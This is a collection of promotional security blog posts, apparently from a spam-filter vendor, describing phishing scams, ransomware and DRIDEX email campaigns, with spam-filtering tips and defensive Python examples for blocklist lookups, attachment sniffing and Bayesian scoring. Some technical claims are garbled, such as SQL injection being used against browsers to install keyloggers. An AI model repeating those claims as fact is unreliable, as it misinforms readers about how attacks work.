Attachments may not be opened or could be blocked by spam filters. To get around this issue, hackers often send links to cloud-storage services such as Dropbox. The user clicks the link and downloads the malware thinking it is a genuine file.
Once installed, the malware gets to work encrypting files stored on local and mounted network drives. The user is not made aware of the infection until their computer is rebooted. In order to decrypt the files, the end user must pay the ransom. This is typically $500, paid in Bitcoin.
It is not known whether hackers have acted on their threats to publish company data. Many businesses have been too scared to find out and have given in to the ransom demand.
How to protect your business from Chimera ransomware
There is no such thing as 100% protection from Chimera ransomware, but it is possible to reduce the risk of infection to a minimal level. Installing anti-spam solutions can prevent malware from reaching inboxes; however, not all products offer protection from phishing links.
SpamTitan software on the other hand employs a powerful spam filter which uses dual AV engines to maximize the probability of malicious emails being caught. It also includes an anti-phishing module to protect against phishing links. If you don’t want to have to pay a ransom to recover your data, installing SpamTitan is the logical choice.
Are you protected from Chimera Ransomware? Would you risk the publishing of your business data or would you pay the ransom?
If you live in Ireland, you may receive an email offering you a refund on your electricity bill; however, the email is not genuine. Scammers are targeting current and former customers of Electric Ireland hoping they will respond to the offer of a refund. By doing so they will receive no money. They will just have their bank accounts emptied.
The Electric Ireland phishing scam is highly convincing
The Electric Ireland phishing emails appear to be genuine. They give a valid reason for clicking on the link contained in the email, and have been well written. The link directs the recipient to a phishing website that looks genuine. Even the request made on the website is perhaps not unreasonable.
In order to receive the refund, customers must enter their banking information to allow the electricity company to make a transfer. In order to confirm their identity, current and former customers must supply proof of identity. The scammers ask for a scan of customers' passports.
Other reports indicate that some customers have been sent links to fake websites that require them to disclose their mobile phone numbers as well as security codes and passwords.
It is unclear how the scammers have obtained the email addresses of Electric Ireland customers, as according to the utility company there has been no security breach, and the database in which customer account information is stored remains secure. However, an audit is being conducted by the company’s IT department to determine if any individual has managed to infiltrate its network or has otherwise gained access to customer data.
A spokesman for the Garda has confirmed that many Irish citizens have already fallen for the Electric Ireland phishing scam and have reported that fraudulent withdrawals have been made from their personal bank accounts.
The Electric Ireland phishing scam is one of many highly convincing campaigns to have been uncovered in recent weeks. Online criminals have become more skilled at crafting emails and setting up malicious websites, and it can be difficult to determine whether a request is genuine or fake.
The Electric Ireland phishing scam may look genuine, but legitimate companies would not send emails requesting sensitive information of that nature to be disclosed over the Internet. It should also be noted that if a company has taken excess funds from a bank account to pay a bill, the company would be able to issue a refund directly to the same bank account. They would not require those details to be provided again – nor request copies of ID, mobile phone numbers, or passwords.
Any individual who has fallen for the Electric Ireland phishing scam should contact their bank immediately and place a block on their account. This will prevent the criminals from making any further fraudulent transfers. However, it may be too late for many customers to prevent losses being suffered.
To reduce the risk of falling for phishing scams, the best defense is to block spam and scam emails from being delivered. To do this a spam filter should be used, such as that provided by SpamTitan. SpamTitan Technologies Anti-Spam solutions also include an Anti-Phishing module to ensure all users are better protected from malicious websites when surfing the Internet.
Any time an email is received that offers a refund, it is inadvisable to click on a link in the email. Attempts should be made to contact the company directly by calling the number listed on that company's website. The matter should first be discussed with the company's customer service department. Never open an attachment contained in such an email, and never divulge confidential information over the internet unless 100% sure of the genuineness of the website.
UK workers are being targeted with a new email money transfer scam, according to a new police intelligence report. The current threat level has been deemed to be high enough to warrant a warning being issued by Financial Fraud Action UK to alert UK employees to the risk of attack.
Rather than the campaign being sent in mass email spam mailings, individuals are being targeted by criminals using a new spear phishing campaign that attempts to fool users into making a transfer from their personal account in order to secure an important work contract, or help resolve an urgent work issue.
The highly convincing scam involves the sending of emails to individuals in a particular organization that is being targeted. The perpetrators of the campaign have masked the email address of the sender, making it appear as if the email has actually been sent by their boss, a work colleague, or member of the accounts department. In some cases, the emails have actually been sent from a real account.
Email money transfer scam conducted in two separate attacks
Criminals first compromise an email account in the organization under attack by gaining access to an individual’s login credentials using a separate phishing campaign or by hacking passwords. Criminals have been able to gather a large amount of data on individuals via social media networks such as Facebook, Twitter, and LinkedIn. That information is subsequently used to craft convincing email campaigns to fool their targets into revealing sensitive information to gain access to their email accounts.
Those accounts are then used to send email requests to other individuals within the organization asking for a bank transfer to be made. The requests are out of the ordinary but, as explained in the scam emails, the payments are critical to the running of the business. Once a transfer has been made, the money is rapidly withdrawn from the scammer’s account. Victims are left with little recourse to get their money back.
The email money transfer scam has proved to be particularly effective. Employees see that the email has been sent by a manager and, out of a sense of duty or fear of job loss, they respond without first checking the genuineness of the email. Oftentimes, the perpetrators of the crime have sent emails from senior managers' and partners' accounts. An employee lower down the ladder would not typically have direct contact with these people, lessening the chance of them contacting that person directly to validate the request. Contact information is often provided in the email that will put the target in direct contact with the scammer, who will then validate the request.
Senior managers and partners are the initial targets in this new email money transfer scam. Criminals attempt to fool them into revealing their login credentials. Employees are the secondary targets who actually arrange the transfers to the fraudsters’ accounts. Both groups of individuals should be warned of the risk, and measures should be implemented to reduce the risk of the phishing campaigns being delivered.
To protect against the first attack made by the perpetrators of this email money transfer scam, it is recommended that companies make the following changes to improve security:
- Issue alerts to their employees, including senior managers, warning of the latest wave of phishing campaigns to put them on high alert.
- Enforce changes to email account passwords, ensuring that only secure passwords are used. Stipulate a minimum of 8 characters, force the use of special characters (!, ", £, $, %, ^, &, *, (, or ) for example), and ensure that at least one capital letter and one number is included.
- Purchase a robust Anti-Spam filtering solution to prevent phishing emails from being delivered to employees’ inboxes. SpamTitan also includes an Anti-Phishing module that can provide additional protection against complex campaigns such as this.
- Ensure that all Anti-Virus software has its virus definitions updated on a daily basis.
- Scammers often attempt to obtain login credentials by fooling targets into visiting a link to a malicious website containing malware. The sites may contain malicious code that probes for weaknesses in the target’s browser. The attackers then use SQL injection techniques to exploit software vulnerabilities and install keyloggers to obtain passwords. Anti-Phishing software can block these sites, providing protection even if an email link is clicked.
- Security vulnerability scans should be conducted regularly. Updates may be issued regularly so daily checks should be conducted. A scan may reveal a critical Windows 10 security update is required, or Oracle, Chrome, Firefox, Skype, or Adobe Flash may need to be updated.
- Inform employees of the company’s processes for requesting payments via bank transfers and confirm that under no circumstances would an employee receive a request via email to make a transfer to a senior manager or partner.
Protecting end users from becoming victims of an email money transfer scam
End users should also be informed about the correct actions to take when receiving email requests:
- This email money transfer scam relies on the user being fooled into thinking the email has been sent from a manager’s account. End users should check the email address used to make sure it has been sent from a company account, but remain wary that a company account could have been hijacked.
- To contact the person who has made the request directly. Since email accounts may have been compromised, this should be done via telephone using the company switchboard or direct dial numbers, not the telephone numbers supplied in the email.
- To exercise extreme caution when receiving any request which appears to be out of the ordinary, especially when that request involves making a bank transfer or requests that sensitive information is disclosed.
- To read any email carefully, and then re-read it to identify spelling errors, grammatical mistakes or language that would be out of keeping with an email typically sent by that individual.
A new DRIDEX email scam has been discovered that has prompted an angry reaction from Swedish furniture retailer Ikea. The criminals behind the malware have targeted Ikea customers by sending fake emails encouraging them to open a DRIDEX-infected email attachment. It has been estimated that hundreds of thousands of emails have been sent in the past few days alone.
As is common with spam emails, users are not specifically targeted. Instead the senders of the emails rely on volume. This is why targeting a retailer the size of Ikea is particularly effective. The chances of an email arriving in the inbox of a customer are relatively high in Europe. Many individuals regularly visit IKEA or have done so in the past.
What is particularly worrying about this campaign is the fact the emails look genuine. They contain an attachment which appears to be a purchase receipt from IKEA. The receipt looks exactly the same as one supplied by the store.
IKEA is concerned that the spam emails will tarnish the company’s reputation, even though there is nothing the company could have done to prevent the campaign from being launched. The advice provided is not to open any attachments in emails that appear to have been sent by the furniture retailer.
What is DRIDEX Malware?
DRIDEX is a nasty piece of malware designed to steal online banking login names and passwords. It is a new variant of CRIDEX, a known form of malware with worm and Trojan variants (W32.Cridex and Trojan.Cridex). The new form of the Cridex malware achieves its objective via HTML injection. This is a technique used by hackers to inject code to exploit vulnerabilities in popular applications such as Java or ActiveX. HTML injection modifies page content.
This method of attack is effective as the user is fooled into thinking a site being visited can be trusted, as the page is located within a trusted domain. When the user enters a login name and password, these are then sent on to the hacker. In this case, the user would reveal their bank logins and passwords, which would then be used to make fraudulent transfers to a hacker’s account.
DRIDEX malware first emerged in November last year and attacks have mainly affected computer users in Europe. Due to the ease with which the perpetrators of this campaign can obtain users’ banking credentials, this malware is particularly dangerous. All users, not just IKEA customers, should be particularly wary about opening email attachments or responding to emails containing links to webpages, especially if the emails are sent from individuals not known to the email recipient.
The malware was first used in the UK, but has since spread around Europe and has now been received in Sweden where IKEA is based. To date it has been estimated that the malware has allowed the perpetrators of the campaign to obtain around £20 million from fraudulent transfers, in addition to $10 million from U.S. banks. IKEA is now monitoring the situation and is attempting to identify the source of the emails; however, since the perpetrators of campaigns such as this are typically mobile, it is particularly difficult to catch the criminals responsible.
How is it possible to protect against DRIDEX Malware?
Email scams such as this are becoming increasingly common and users can easily be fooled into installing malware. DRIDEX appears to be primarily transmitted by spam email attachments.
Fortunately, there is an easy way of protecting against a DRIDEX malware infection. Since spam emails are now becoming harder to spot, the easiest solution is to prevent DRIDEX emails from being delivered. To do that, a spam filter such as SpamTitan is required.
SpamTitan is able to identify spam emails containing DRIDEX as the signature of the malware is present in the Anti-Virus engines used by the software. SpamTitan uses two separate AV engines which increases the probability of the malware being detected.
Since new malware is being devised and sent with increasing regularity, all email users should also be taught how to identify potential phishing emails as a failsafe. This will help to ensure they do not become another email scam victim, or inadvertently compromise their employer’s network.
Email spam may not be the first choice of hackers for making money, but there are plenty of online criminals who still use email to fool users into installing malware on their computers or revealing sensitive information.
This week, two new email spam warnings have been issued following reports that consumers have received emails that have aroused their suspicions. When checking the authenticity of the emails received, they discovered they were scams. The warnings were issued by the Better Business Bureau (BBB) in an effort to prevent the scams from claiming victims.
The latest email spam campaigns differ from each other, but use tried and tested techniques which have proven to be highly effective in the past.
Jury Duty Scam Email Discovered
Trust in authority figures is being exploited in a new email spam campaign in which users are urged to take action as a result of missing jury duty. A similar email is doing the rounds warning recipients of an impending court case. Should the recipient of the email ignore the request, the case will be heard in their absence and they will not be allowed to mount a defense.
The emails shock recipients into taking rapid action such as clicking a link or opening an email attachment. These two emails are clever in the fact they warn users of the need to respond to a judge or turn up in court, yet the crucial information needed to do so is not supplied in the email body.
Any email recipient believing the email is genuine is likely to open the attachment or click a link to find out which court needs to be visited. By doing so they are guaranteed to have their computer, laptop or mobile device infected with malware.
The BBB was alerted to the scams and issued a warning advising recipients of these emails to delete them immediately. The advice stated that the U.S. Courts would not contact individuals about jury duty by email; letters are mailed or telephone calls are made instead.
Church Leaders Warned not to Fall for Money Transfer Email Spam Campaigns
The second scam was recently reported by the finance director of Grace Bible Church, who received a request via email to transfer funds to a senior pastor. In this case, the email appeared to be official, having been sent from the senior pastor’s email account.
It is a good security practice to always check the authenticity of an email that requests a transfer of funds. In this case all it took was a quick phone call to the pastor in question to reveal that the request was bogus.
If it is not possible to contact the individual, deleting the email would be the best next course of action. If the request is genuine, the individual in question is likely to make contact again. Spammers tend to send these campaigns randomly. A second request is unlikely to be received if the first is ignored.
The Fight Against Email Spam is Getting Easier
Spam email campaigns are still an effective method of malware delivery. Social media posts and infected websites may now be the preferred method of infection, but users must still be wary about opening attachments or visiting links sent from people they do not know.
Awareness of the tell-tale signs of an email scam has improved in recent years. So has security software used to detect phishing campaigns. SpamTitan Technologies is one such company that provides a highly effective spam filtering solution. It boasts an exceptionally low false positive rate and catches over 99.98% of all spam emails.
Part of the reason why SpamTitan’s Award Winning Anti-Spam solution is so effective at catching email spam is the power of the AV engines used. Instead of using one class-leading AV engine, it uses two: Kaspersky Labs and Clam Anti-Virus.
By installing this anti-spam solution, malicious emails used to phish for sensitive information can be blocked before they are delivered to an email inbox. Businesses looking to reduce the risk of end users infecting their desktop computers, laptops and portable devices with malware and viruses, will find SpamTitan’s Anti-Spam solutions for the enterprise highly cost-effective. Rather than purchasing a package that offers protection for far more IP addresses than are required, IT professionals can purchase a license that covers end users without wastage.
City of London Police are sending emails containing important information about a murder suspect. You must be vigilant, and if you see this individual, you should not approach him! The attachment sent via email contains his image, so you will know to avoid him and alert the police if you see him. Unfortunately, opening the attachment will make you a victim. You will not be murdered, but you may end up having your bank account emptied. Yes, this is a City of London Police email scam, and it attempts to convince the good, law abiding public to infect their devices with malware.
City of London Police Email Scam Warning!
One of the latest email scams to be wary of, especially if you live in the UK, involves spam emails with the subject “London City Police.” Contained in the email is a bulletin detailing a murder suspect on the loose, together with a malware-infected attachment.
Fortunately for the wary, there is a clue in the subject that the email is not genuine. There is of course no “London City Police.” The police force in question is called “The City of London Police.” That said, the shock of receiving an email from law enforcement about a murderer on the loose may be enough to convince many to open the email and the attachment.
As one would expect, the email contains a stern warning, with the content phrased in such a way that it could in fact have been sent by the police force. A murderer on the loose in London is a serious matter, and this cunning email spam campaign has been devised to play on the fear that such a matter is likely to create.
How would the Police force have got your email address, and those of everyone else living in your area? That is something that many victims of this email scam may ponder after opening the attachment. Of course, by then it will be too late. Opening the attachment will result in malware being installed on the victim’s computer.
Fortunately, email scams such as this are easy to avoid. In fact, if precautions have been taken, they would not even reach an inbox, as explained by Steven Kenny, Customer Support Manager at TitanHQ.
Kenny pointed out that by using SpamTitan, computer users will be protected. He said, “This malware was blocked by SpamTitan before it had a chance to make it to users’ inboxes.” He went on to say, “The malware contained in the attachment was flagged as a virus. The attachment is a zip file; once executed, the malware goes to work.”
SpamTitan Blocked the City of London Police Email Scam
The image below is a screenshot of the City of London Police email scam, which was successfully blocked by SpamTitan.
Current High Risk of Malware Infection
Malware poses a major risk to individuals, but businesses are especially at risk of infection. Employees may be wary of opening emails on their own devices, but are they as security conscious at work?
It is perhaps easier to believe that a work email address would be in the police database, rather than a personal email account. This may lead employees to believe that the email is genuine. Unfortunately, all it takes is for one employee to open an infected attachment, and their computer, and the network it connects to, could be infected.
Since email is essential in business, protections must be put in place to ensure networks are not compromised as a result of the actions of employees. If malware is installed, the losses suffered can be considerable. It therefore can pay dividends to implement protection such as SpamTitan spam filtering. This will prevent malware-infected emails from being delivered to employees’ inboxes.
A spam filter is one of the best ways to reduce email spam risk; however, regardless of whether you choose this important email security measure, there are a number of steps you can take to reduce email spam risk, keep your devices protected, and your valuable data out of the hands of spammers and scammers.
11 Spam Filtering Essentials to Reduce Network Security Risk
Listed below are 11 spam filtering essentials that you can implement to reduce spam volume and the risk of cyber attacks.
1. A Real-Time Block List (RBL) is essential
Spam is commonly sent from a known spam server – one that has been blacklisted, or is known to be used by email spammers. Using a Real-time Block List (RBL) is one of the best protections, as it prevents malicious emails from being delivered to inboxes. This one email security feature has been shown to reduce spam email delivery by 70–90%, and it only takes a few minutes to implement.
Even if you use a spam filter this measure is important. It will reduce the load on your spam filter, email server, and network. An RBL works by blocking messages before they are downloaded, which will also help to save bandwidth. There are a number of ways to do this, although zen.spamhaus.org is one of the best. It is widely regarded as being the best at spam blocking, is updated frequently and importantly boasts a very low false-positive rate.
2. Recipient Verification will block spam sent to invalid email addresses
Spammers like to bombard companies with emails in the hope that some will get through, or that a catch-all is in place and all will be delivered. Common email addresses used are webmaster@, info@, admin@, sales@ and so on. These email addresses are commonly used by companies and there is a good chance that they will be delivered to someone. However, you can use Recipient Verification (RV) to reject the bulk of these emails, and only have properly addressed emails delivered.
To do this, use Microsoft Active Directory integration or upload a CSV file of valid email addresses to your spam filter and mail server. This technique will prevent speculative emails from being downloaded and will similarly reduce the load on your spam filter and mail server, and save bandwidth. This method of spam prevention will take longer to complete than setting up your RBL, but it is a worthwhile investment of your time as it will result in a major reduction in spam delivery.
3. Configure your server to require correct SMTP handshake protocols
This is one of the most effective methods of blocking spambots and it will stop the majority of spambot emails from being downloaded and delivered. This is a fairly quick task to complete, and should only take you a few minutes. You will need to set your configuration to require a HELO (EHLO) with a Fully Qualified Domain Name. However, it is important to note that it may be necessary to add some of your suppliers to a whitelist to ensure that their messages do not also get blocked. Not all of your suppliers and contacts will have their own email servers configured correctly, so genuine emails may be caught and blocked. Individual organizations will find this step particularly beneficial. MSPs less so, or not at all.
By using the above three spam prevention methods – which incidentally can be used on virtually all email servers – you will make a considerable bandwidth saving, and dramatically reduce the number of spam emails that are downloaded. This will also help to protect your network from malware. If you allocate just 30 minutes to do all three, it will save weeks of your time, which can be better spent on other cybersecurity tasks.
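The three envelope-stage checks above, as an added Python example (not SpamTitan's code nor any particular mail server's implementation): the reversed-octet query name and return-code handling for zen.spamhaus.org, a Recipient Verification list loaded from a CSV export, and the HELO/EHLO FQDN requirement with the supplier whitelist the text mentions. The DNS resolver is injected as a function so the example runs offline; the addresses, hostnames and the stand-in DNS table are constructed sample data.

```python
import csv
import io
import ipaddress
import re
from typing import Callable, Optional, Set, Tuple

# Added example, not an MTA's or SpamTitan's code. Spamhaus ZEN answers are
# 127.0.0.x and the last octet names the sub-list (SBL/XBL/DROP/PBL, per the
# return codes Spamhaus publishes; re-check them against the current docs).
# Answers in 127.255.255.0/24 are query-error codes and never listings.
RBL_ZONE = "zen.spamhaus.org"


def rbl_query_name(ip: str, zone: str = RBL_ZONE) -> str:
    """Reverse the octets and append the zone: 192.0.2.7 -> 7.2.0.192.<zone>."""
    if ipaddress.ip_address(ip).version != 4:
        raise ValueError("this example handles IPv4 only")
    return ".".join(reversed(ip.split("."))) + "." + zone


def rbl_verdict(answer: Optional[str]) -> Optional[str]:
    """Map the A-record answer to a sub-list name; None means not listed."""
    if answer is None:
        return None
    if answer.startswith("127.255.255."):
        raise RuntimeError(f"RBL query error {answer}; not a listing")
    last = int(answer.rsplit(".", 1)[1])
    if 2 <= last <= 3:
        return "SBL"
    if 4 <= last <= 7:
        return "XBL"
    if last == 9:
        return "DROP"
    if 10 <= last <= 11:
        return "PBL"
    return "listed (unrecognised code)"


def load_valid_recipients(csv_text: str) -> Set[str]:
    """Recipient Verification list: one address per row, as exported from a
    directory or maintained by hand; comparison is case-insensitive."""
    valid = set()
    for row in csv.reader(io.StringIO(csv_text)):
        if row and row[0].strip() and not row[0].startswith("#"):
            valid.add(row[0].strip().lower())
    return valid


# A fully qualified hostname: two or more labels of letters, digits and
# hyphens with an alphabetic top-level label; "PC1" or "localhost" fail.
_FQDN = re.compile(
    r"^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$", re.I)


def helo_is_fqdn(helo: str) -> bool:
    return bool(_FQDN.match(helo))


def check_envelope(client_ip: str, helo: str, rcpt: str,
                   resolver: Callable[[str], Optional[str]],
                   valid_rcpts: Set[str],
                   helo_whitelist: Set[str] = frozenset()) -> Tuple[bool, str]:
    """Apply the three checks cheapest-first, before any message body is
    accepted. resolver(name) returns the A record or None for NXDOMAIN."""
    listing = rbl_verdict(resolver(rbl_query_name(client_ip)))
    if listing:
        return False, f"554 {client_ip} listed in {RBL_ZONE} ({listing})"
    # Suppliers with misconfigured servers are exempted from the HELO check only.
    if client_ip not in helo_whitelist and not helo_is_fqdn(helo):
        return False, f"504 HELO {helo!r} is not a fully qualified hostname"
    if rcpt.lower() not in valid_rcpts:
        return False, f"550 {rcpt} is not a valid recipient; no catch-all"
    return True, "250 ok"


# Constructed sample data: a directory export and a stand-in DNS table.
SAMPLE_CSV = "# address\nalice@example.com\nsales@example.com\n"
FAKE_DNS = {
    "7.2.0.192." + RBL_ZONE: "127.0.0.4",         # listed on XBL
    "9.2.0.192." + RBL_ZONE: "127.255.255.254",   # query-error code
}
fake_resolver = FAKE_DNS.get  # dict.get returns None, like NXDOMAIN
```

Replace `fake_resolver` with a real A-record lookup to use it against live DNS, and note that a 127.255.255.x answer must be treated as "check failed", not as a listing.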
4. Regularly scan for viruses
A basic security measure is to use a robust and powerful anti-virus program, regardless of whether you use spam filtering. If you don’t implement spam filtering, this measure is especially important, as you are more likely to have viruses delivered to email inboxes.
Even with spam filtering in place, it is also important to have anti-virus software installed and, of course, AV engine and virus definitions need to be kept up to date. Software should be configured to update definitions automatically.
With spam filtering in place, it should be possible to stipulate the update frequency. Be aware that a different anti-virus can be employed to protect endpoints. Using the same AV engine for mail servers and endpoints means that if for any reason your AV software does not detect a virus, all endpoints could potentially be affected. By using a different AV engine for endpoints and mail servers, you maximize the probability of a virus being detected. Fortunately, competition is fierce in this market, so you should not have to pay top dollar to have two different engines in use.
The following steps will apply if you have a spam filter. These will apply no matter which spam filter is used, be that open source, commercial or even cloud-based spam filtering.
5. Certain attachments carry higher risks so block them!
Executable files – those with a .exe suffix – are particularly risky. Fortunately, it is not necessary to run the risk of a user double clicking on them. The best option is to block these file types and other risky file types if they are not typically needed by staff members. Be aware that spammers are sneaky. It is common knowledge that .exe files are risky, so they mask them with other extensions: PDF, XLS, DOC files for example. To counter this, block by MIME type, not by file extension.
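An added Python example (not SpamTitan code) of the point above: attachments are judged by their leading bytes rather than by the filename extension or the declared Content-Type, both of which the sender controls, and archives are opened in memory so a renamed executable inside a zip is caught too. The message and its attachments are constructed inline.

```python
import io
import zipfile
from email import message_from_bytes, policy
from email.message import EmailMessage
from typing import List, Tuple

# Added example, not SpamTitan code. Leading bytes identify the real type of
# a file (well-known magic numbers); the filename and declared Content-Type
# are both chosen by the sender and are ignored when deciding to block.
MAGIC = {
    b"MZ": "application/x-dosexec",                    # PE: .exe/.dll/.scr
    b"%PDF": "application/pdf",
    b"PK\x03\x04": "application/zip",                  # also .docx/.xlsx
    b"\xd0\xcf\x11\xe0": "application/x-ole-storage",  # legacy .doc/.xls
}
BLOCKED = {"application/x-dosexec"}


def sniff(data: bytes) -> str:
    for magic, mime in MAGIC.items():
        if data.startswith(magic):
            return mime
    return "application/octet-stream"


def inspect_bytes(data: bytes) -> Tuple[str, bool]:
    """Return (sniffed type, blocked?). Archives are opened in memory and each
    member sniffed too, so a renamed .exe inside a .zip is caught as well."""
    actual = sniff(data)
    if actual == "application/zip":
        try:
            with zipfile.ZipFile(io.BytesIO(data)) as zf:
                for info in zf.infolist():
                    with zf.open(info) as member:
                        if sniff(member.read(8)) in BLOCKED:
                            return actual, True
        except zipfile.BadZipFile:
            return actual, True  # unreadable archive: fail closed
    return actual, actual in BLOCKED


def attachment_verdicts(raw: bytes) -> List[Tuple[str, str, str, bool]]:
    """(filename, declared type, sniffed type, blocked?) per attachment."""
    msg = message_from_bytes(raw, policy=policy.default)
    verdicts = []
    for part in msg.iter_attachments():
        payload = part.get_payload(decode=True) or b""  # transfer-decoded bytes
        actual, blocked = inspect_bytes(payload)
        verdicts.append((part.get_filename() or "(unnamed)",
                         part.get_content_type(), actual, blocked))
    return verdicts


def build_sample() -> bytes:
    """Constructed message: a fake executable named invoice.pdf, a genuine-
    looking PDF, and a zip hiding another fake executable."""
    fake_exe = b"MZ" + b"\x90" * 62          # DOS header magic plus padding
    archive = io.BytesIO()
    with zipfile.ZipFile(archive, "w") as zf:
        zf.writestr("receipt.pdf.exe", fake_exe)
    msg = EmailMessage()
    msg["Subject"] = "Your invoice"
    msg.set_content("Please see the attached invoice.")
    msg.add_attachment(fake_exe, maintype="application", subtype="pdf",
                       filename="invoice.pdf")
    msg.add_attachment(b"%PDF-1.4\n%constructed\n", maintype="application",
                       subtype="pdf", filename="real.pdf")
    msg.add_attachment(archive.getvalue(), maintype="application",
                       subtype="zip", filename="receipt.zip")
    return bytes(msg)
```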
6. Take Action to Block Phishing Emails
Phishing emails can easily fool employees into clicking on links that direct them to URLs loaded with malware. There are a number of URLs that are recognized as phishing websites and it is possible to block these quickly and easily. To do this, use SURBL and URIBL lists to check for website domains that frequently appear in unsolicited emails.
7. Ensure that your spam pattern library is regularly updated
You may find that your spam pattern library cannot be configured manually, as this may be hard-wired into your spam filter. Spam signatures are based on a huge database containing recently added spam, as well as past signatures, with the spam-fighting community adding to the database on a daily basis. There are many different resources that can be used, although if you want to ensure you have a fully up to date database of spam signatures, SpamAssassin is arguably the best choice.
8. Bayesian filtering will recognize more spam and block less ham
A Bayes engine is used by most spam filtering engines and can be trained to recognize spam and differentiate it from ham (i.e. not spam). It is therefore important to use a regularly updated spam pattern library, which assigns a score to incoming emails, in addition to using feedback provided by end users. The Bayes engine learns what is spam and what is not, and will apply the lessons learned to new emails that are received, constantly improving its detection rates to ensure all spam is caught, and false positives are reduced.
9. Stipulate the spam score that is right for your company
As a system administrator you have the power to decide what spam score is right for your company. This will depend on how much risk you want to take. You will find that spam filters will usually allow you to dictate how aggressive they are, although you may find this requires a certain degree of tweaking to ensure that spam doesn’t get through and ham doesn’t get accidentally blocked. A spam score is assigned by a number of factors, although the type of attachments and the email content are the two main ways that the spam score is calculated. This process is not particularly time consuming, but bear in mind that the first two weeks after your spam filter has been installed is when this task will need to be completed. Be sure to use your trial period to tweak your spam filter to ensure that spam is blocked and the number of false positives is kept to a minimum.
10. Get your end users working for you
Your spam filter will not always get things right, and some spam and junk emails will slip through the net from time to time. It is therefore useful to instruct end users to manually mark any spam and junk emails received, should they get delivered to their inboxes. End users can help to train your Bayes engine to recognize new spam emails and correct false positives.
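Points 8 to 10 as one added Python example (not SpamTitan's engine): a small Bayes classifier scored on a 0-10 scale, the administrator's threshold, and the end-user report that retrains it so a lure which slipped through is caught next time. The training mail and the lure messages are constructed sample text.

```python
import math
import re
from collections import Counter
from typing import Set

# Added example, not SpamTitan's engine. Scores run 0-10; the administrator's
# threshold (point 9) decides where "spam" starts.
_TOKEN = re.compile(r"[a-z0-9']+")


def tokens(text: str) -> Set[str]:
    """One occurrence per token per message, so repeating a word gains nothing."""
    return set(_TOKEN.findall(text.lower()))


class BayesFilter:
    def __init__(self, threshold: float = 5.0):
        self.threshold = threshold
        self.spam_docs = 0
        self.ham_docs = 0
        self.spam_tokens: Counter = Counter()
        self.ham_tokens: Counter = Counter()

    def train(self, text: str, is_spam: bool) -> None:
        if is_spam:
            self.spam_docs += 1
            self.spam_tokens.update(tokens(text))
        else:
            self.ham_docs += 1
            self.ham_tokens.update(tokens(text))

    def score(self, text: str) -> float:
        """Prior log-odds plus one Laplace-smoothed log-likelihood ratio per
        token seen in training; never-seen tokens carry no evidence."""
        log_odds = math.log((self.spam_docs + 1) / (self.ham_docs + 1))
        for t in tokens(text):
            s, h = self.spam_tokens[t], self.ham_tokens[t]
            if s == 0 and h == 0:
                continue
            p_spam = (s + 1) / (self.spam_docs + 2)
            p_ham = (h + 1) / (self.ham_docs + 2)
            log_odds += math.log(p_spam / p_ham)
        p = 1.0 / (1.0 + math.exp(-log_odds))
        return round(10 * p, 2)

    def is_spam(self, text: str) -> bool:
        return self.score(text) >= self.threshold

    def user_report(self, text: str, is_spam: bool) -> None:
        """Point 10: a user marks a delivered message as spam (or rescues a
        false positive) and the filter learns from it straight away."""
        self.train(text, is_spam)


# Constructed training mail standing in for the initial pattern library.
SPAM = ["urgent bank transfer required today wire funds",
        "claim your prize winner lottery transfer",
        "cheap meds discount offer click here"]
HAM = ["meeting notes attached please review by friday",
       "invoice for march attached as discussed",
       "can you transfer the meeting to thursday"]


def train_baseline(threshold: float = 5.0) -> BayesFilter:
    f = BayesFilter(threshold)
    for text in SPAM:
        f.train(text, True)
    for text in HAM:
        f.train(text, False)
    return f


if __name__ == "__main__":
    f = train_baseline()
    lure = "your ikea receipt attached please open the attached receipt"
    variant = "ikea receipt attached open now"
    print("before feedback:", f.score(lure), f.score(variant))  # both below 5
    f.user_report(lure, True)   # a user flags the lure that slipped through
    print("after feedback:", f.score(variant), f.is_spam(variant))
```

Lowering the threshold (try `train_baseline(threshold=2.0)`) catches the variant before any feedback, which is the trade-off point 9 describes: a more aggressive score setting blocks more spam at the cost of more false positives.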
11. Provide email security awareness training to employees
Nowadays it is essential that all staff members receive security awareness training. They must be taught how to identify spam emails, phishing campaigns, and potential viruses. They must also be informed of the correct actions to take if they do discover a phishing scam or suspect that an email may contain malware or a virus. Also instruct them on the correct actions to take if they do accidentally open a suspicious attachment.
Is it the job of a system administrator to train employees how to protect themselves and their computers? Arguably it is not, but it can save a lot of headaches down the line. Even a little training can go a very long way. Unfortunately, this is an area of email security that is all too often forgotten.
What is essential is that employees are aware of the risks of falling for a phishing campaign or downloading malware. In some cases, it could spell the end of a company, and along with it, their jobs. You can always use CryptoLocker to scare employees into paying attention.
Training could well make all the difference. Besides, if you do provide training and employees still take risky actions and infect the network, you will have a clean conscience and can say “it is not my fault!”, and be justified in saying it.